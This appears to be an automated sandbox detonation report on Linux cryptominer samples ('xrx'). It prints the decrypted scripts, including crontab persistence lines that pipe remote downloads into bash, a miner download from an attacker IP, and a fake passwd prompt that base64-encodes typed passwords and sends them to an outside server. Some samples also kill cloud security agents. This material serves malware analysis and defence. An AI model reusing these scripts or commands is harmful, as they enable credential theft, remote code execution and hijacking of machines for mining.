2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsbe-20240611-en

Max time kernel

9s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-armhf-20240418-en

Max time kernel

140s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsbe-20240611-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Processes

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c exec '/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973' "$@" /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c #!/bin/bash if [ "$1" = "pollo" ]; then echo 'pollo 👍' exit fi username=$(whoami) if [ "$username" = "root" ]; then if [ "$#" -ne "0" ]; then echo 'Changing password for user '$1. else echo 'Changing password for user root.' fi sleep 0.1 read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi else echo 'Changing password for user '$username. read -sp '(current) UNIX password:' passvar0 echo -e read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar0 $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi fi /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/usr/bin/whoami

[whoami]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://45.10.20.100:1010/pass?pass=cm9vdAo=]

/usr/bin/sleep

[sleep 0.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 45.10.20.100:1010 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsel-20240611-en

Max time kernel

4s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsbe-20240729-en

Max time kernel

2s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/239/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/387/stat /usr/bin/killall N/A
File opened for reading /proc/160/stat /usr/bin/killall N/A
File opened for reading /proc/748/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/387/stat /usr/bin/killall N/A
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/239/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/80/stat /usr/bin/killall N/A
File opened for reading /proc/668/stat /usr/bin/killall N/A
File opened for reading /proc/696/stat /usr/bin/killall N/A
File opened for reading /proc/711/cmdline /usr/bin/killall N/A
File opened for reading /proc/67/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/496/stat /usr/bin/killall N/A
File opened for reading /proc/712/cmdline /usr/bin/killall N/A
File opened for reading /proc/67/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/348/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/717/stat /usr/bin/killall N/A
File opened for reading /proc/717/cmdline /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/712/stat /usr/bin/killall N/A
File opened for reading /proc/738/stat /usr/bin/killall N/A
File opened for reading /proc/80/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/67/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/717/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/160/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/741/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/671/stat /usr/bin/killall N/A
File opened for reading /proc/736/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/739/stat /usr/bin/killall N/A
File opened for reading /proc/177/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win7-20241023-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\config.json

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\config.json

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\xrx\config.json

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\xrx\config.json"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 440823ad7fa615c7d769b03ca7221578
SHA1 9a866866eb8cd5a27e8ffbee63e22aaeb5895075
SHA256 46a3d081a71a3ccfa1f07a3d7594af2eaa5c2c9c75f7301c2140cd1a5664b42f
SHA512 b9293c8ca8f35e3acb5fbff241ca0b0903e3bfef1b27aa1882369a9acf059d3edf03d8f1a660da3978f9e7a2b8ecb2e7043c69db823ace1cef4e08f94487208c

Analysis: behavioral23

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

140s

Max time network

131s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/56/cmdline /usr/bin/pidof N/A
File opened for reading /proc/192/cmdline /usr/bin/pidof N/A
File opened for reading /proc/785/stat /usr/bin/pidof N/A
File opened for reading /proc/1810/cmdline /usr/bin/pidof N/A
File opened for reading /proc/20/cmdline /usr/bin/pidof N/A
File opened for reading /proc/201/stat /usr/bin/pidof N/A
File opened for reading /proc/1925/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1982/stat /usr/bin/pidof N/A
File opened for reading /proc/2200/cmdline /usr/bin/pidof N/A
File opened for reading /proc/11/cmdline /usr/bin/pidof N/A
File opened for reading /proc/48/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1067/stat /usr/bin/pidof N/A
File opened for reading /proc/1077/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1800/stat /usr/bin/pidof N/A
File opened for reading /proc/1851/stat /usr/bin/pidof N/A
File opened for reading /proc/1956/stat /usr/bin/pidof N/A
File opened for reading /proc/1985/stat /usr/bin/pidof N/A
File opened for reading /proc/21/cmdline /usr/bin/pidof N/A
File opened for reading /proc/51/cmdline /usr/bin/pidof N/A
File opened for reading /proc/191/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1879/stat /usr/bin/pidof N/A
File opened for reading /proc/2499/cmdline /usr/bin/pidof N/A
File opened for reading /proc/39/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2064/stat /usr/bin/pidof N/A
File opened for reading /proc/53/stat /usr/bin/pidof N/A
File opened for reading /proc/18/stat /usr/bin/pidof N/A
File opened for reading /proc/18/cmdline /usr/bin/pidof N/A
File opened for reading /proc/19/stat /usr/bin/pidof N/A
File opened for reading /proc/37/cmdline /usr/bin/pidof N/A
File opened for reading /proc/189/stat /usr/bin/pidof N/A
File opened for reading /proc/789/stat /usr/bin/pidof N/A
File opened for reading /proc/1129/cmdline /usr/bin/pidof N/A
File opened for reading /proc/7/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1822/stat /usr/bin/pidof N/A
File opened for reading /proc/41/stat /usr/bin/pidof N/A
File opened for reading /proc/197/stat /usr/bin/pidof N/A
File opened for reading /proc/389/stat /usr/bin/pidof N/A
File opened for reading /proc/862/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1401/stat /usr/bin/pidof N/A
File opened for reading /proc/1785/stat /usr/bin/pidof N/A
File opened for reading /proc/1925/stat /usr/bin/pidof N/A
File opened for reading /proc/39/stat /usr/bin/pidof N/A
File opened for reading /proc/1958/cmdline /usr/bin/pidof N/A
File opened for reading /proc/48/stat /usr/bin/pidof N/A
File opened for reading /proc/384/cmdline /usr/bin/pidof N/A
File opened for reading /proc/385/stat /usr/bin/pidof N/A
File opened for reading /proc/757/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2002/cmdline /usr/bin/pidof N/A
File opened for reading /proc/34/stat /usr/bin/pidof N/A
File opened for reading /proc/34/cmdline /usr/bin/pidof N/A
File opened for reading /proc/45/stat /usr/bin/pidof N/A
File opened for reading /proc/1076/stat /usr/bin/pidof N/A
File opened for reading /proc/1402/stat /usr/bin/pidof N/A
File opened for reading /proc/1686/stat /usr/bin/pidof N/A
File opened for reading /proc/2000/stat /usr/bin/pidof N/A
File opened for reading /proc/2275/stat /usr/bin/pidof N/A
File opened for reading /proc/10/stat /usr/bin/pidof N/A
File opened for reading /proc/2304/cmdline /usr/bin/pidof N/A
File opened for reading /proc/26/cmdline /usr/bin/pidof N/A
File opened for reading /proc/202/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1710/stat /usr/bin/pidof N/A
File opened for reading /proc/1792/stat /usr/bin/pidof N/A
File opened for reading /proc/1851/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1929/stat /usr/bin/pidof N/A

Processes

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c exec '/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B' "$@" /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/usr/bin/cat

[cat config.json]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/pidof

[pidof xrx]

/tmp/样本/Linux/shc加密脚本/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsel-20240729-en

Max time kernel

1s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/324/stat /usr/bin/killall N/A
File opened for reading /proc/470/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/674/stat /usr/bin/killall N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/706/cmdline /usr/bin/killall N/A
File opened for reading /proc/126/cmdline /usr/bin/killall N/A
File opened for reading /proc/344/stat /usr/bin/killall N/A
File opened for reading /proc/347/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/721/stat /usr/bin/killall N/A
File opened for reading /proc/126/stat /usr/bin/killall N/A
File opened for reading /proc/379/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/738/stat /usr/bin/killall N/A
File opened for reading /proc/80/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/725/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/700/cmdline /usr/bin/killall N/A
File opened for reading /proc/344/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/700/cmdline /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/80/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/158/stat /usr/bin/killall N/A
File opened for reading /proc/721/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/701/stat /usr/bin/killall N/A
File opened for reading /proc/723/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/179/stat /usr/bin/killall N/A
File opened for reading /proc/721/stat /usr/bin/killall N/A
File opened for reading /proc/379/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/158/stat /usr/bin/killall N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/179/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/158/stat /usr/bin/killall N/A
File opened for reading /proc/345/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/157/cmdline /usr/bin/killall N/A
File opened for reading /proc/685/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

128s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/169/stat /usr/bin/killall N/A
File opened for reading /proc/482/stat /usr/bin/killall N/A
File opened for reading /proc/85/stat /usr/bin/killall N/A
File opened for reading /proc/311/stat /usr/bin/killall N/A
